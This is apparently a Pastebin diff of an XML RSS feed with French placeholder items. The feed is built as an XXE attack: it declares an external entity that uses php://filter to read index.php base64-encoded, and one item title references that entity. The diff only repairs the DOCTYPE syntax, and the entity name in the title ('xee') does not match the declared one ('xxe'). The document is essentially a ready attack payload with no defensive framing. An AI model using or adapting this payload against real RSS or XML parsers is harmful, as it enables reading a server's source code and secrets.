View difference between Paste ID: 4QrhAKJZ and 52W5aNa2
SHOW: | | - or go back to the newest paste.
1
<?xml version="1.0" encoding="UTF-8"?>
2-
<!DOCTYPE channel [!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
2+
<!DOCTYPE channel [
3
	<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=index.php">
4
]>
5
<rss version="2.0">
6
    <channel>
7
        <title>Mon site</title>
8
        <description>lol</description>
9
        <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
10
        <link>http://www.example.org</link>
11
        <item>
12
            <title>actualité &xee;</title>
13
            <description>Ceci est ma première actualité</description>
14
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
15
            <link>http://www.example.org/actu1</link>
16
        </item>
17
        <item>
18
            <title>Actualité N°2</title>
19
            <description>Ceci est ma seconde actualité</description>
20
            <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
21
            <link>http://www.example.org/actu2</link>
22
        </item>
23
    </channel>
24
</rss>